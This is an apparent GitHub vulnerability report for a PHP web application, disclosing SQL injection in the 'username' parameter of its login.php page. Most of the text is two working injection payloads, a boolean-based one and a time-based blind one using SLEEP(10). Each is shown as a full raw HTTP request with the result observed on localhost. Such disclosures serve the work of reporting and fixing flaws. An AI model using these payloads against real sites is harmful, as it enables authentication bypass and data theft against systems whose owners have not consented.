Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

BUG_Author:saintone98

Vulnerability File: /bilal final/login.php

POST parameter 'username' exists SQL injection vulnerability

Payload1: username=1'+OR+NOT+1207%3D1206%23&password=2

POST /bilal%20final/login.php HTTP/1.1
Host: localhost
Content-Length: 44
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/bilal%20final/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: PHPSESSID=2vcgmn9u7h75h5jbjdi1d2e871
Connection: close

username=1'+OR+NOT+1207%3D1206%23&password=2

An error occurred in the sql statement

image

Payload2: username=1'+AND+(SELECT+2+FROM+(SELECT(SLEEP(10)))a)--+b&password=2

POST /bilal%20final/login.php HTTP/1.1
Host: localhost
Content-Length: 67
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/bilal%20final/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: PHPSESSID=2vcgmn9u7h75h5jbjdi1d2e871
Connection: close

username=1'+AND+(SELECT+2+FROM+(SELECT(SLEEP(10)))a)--+b&password=2

The server's response time is 10 seconds

image